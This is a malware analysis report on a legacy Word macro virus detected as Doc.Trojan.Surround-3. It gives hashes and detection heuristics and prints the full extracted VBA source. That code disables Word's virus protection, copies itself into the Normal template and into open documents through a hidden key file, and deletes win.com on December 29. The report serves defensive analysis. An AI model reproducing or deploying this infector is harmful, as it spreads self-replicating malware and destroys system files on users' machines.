Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18d8da029d751c1d…

MALICIOUS

Office (OLE)

35.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 978e4bcd8b976cdb9bbf1881ac46bdaa SHA-1: a7628568b42e4b563606e5693b681795896c5085 SHA-256: 18d8da029d751c1df0cbf3454ab88a351e65b3965dad5fdeb121c497a34bf94b
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains a legacy WordBasic AutoOpen macro that disables virus protection and attempts to export itself as a key file to C:\Surround.key. The AutoExec subroutine contains logic to delete C:\WIN*\win.com on December 29th, suggesting an attempt to interfere with system files or other malware. The presence of the AutoOpen macro and the disabling of virus protection are strong indicators of malicious intent.

Heuristics 4

  • ClamAV: Doc.Trojan.Surround-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Surround-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1636 bytes
SHA-256: 07bc611791223755ca99cd1154ba15c284d35bb90e2929ec893fcf5ecd256da6
Detection
ClamAV: Doc.Trojan.Surround-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Surround"
Sub AutoOpen()
    CreateKey
    DefaultOptions
    InsertInNormal
    InsertInActive
End Sub

Sub AutoNew()
    InsertInActive
End Sub

Sub DefaultOptions()
    Options.VirusProtection = False
    Options.BackgroundSave = True
    Options.SaveNormalPrompt = False
End Sub

Sub AutoExec()
    DefaultOptions
    If Month(Date) = 12 And Day(Date) = 29 Then
        Kill "C:\WIN*\win.com"
        e = MsgBox("You are now Surrounded!!", vbCritical + vbSystemModal, "Virus information", "", 0)
    End If
End Sub

Sub CreateKey()
    For Each component In ActiveDocument.VBProject.VBComponents
        If component.Name = "Surround" Then
            component.Export ("C:\Surround.key")
            SetAttr "C:\Surround.key", vbHidden + vbSystem
        End If
    Next component
End Sub

Sub InsertInNormal()
    For Each component In NormalTemplate.VBProject.VBComponents
        If component.Name = "Surround" Then Exit Sub
    Next component
    If Day(Date) = 21 Then
        Beep
    End If
    NormalTemplate.VBProject.VBComponents.Import ("C:\Surround.key")
End Sub

Sub InsertInActive()
    For Each component In ActiveDocument.VBProject.VBComponents
        If component.Name = "Surround" Then Exit Sub
    Next component
    ActiveDocument.VBProject.VBComponents.Import ("C:\Surround.key")
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.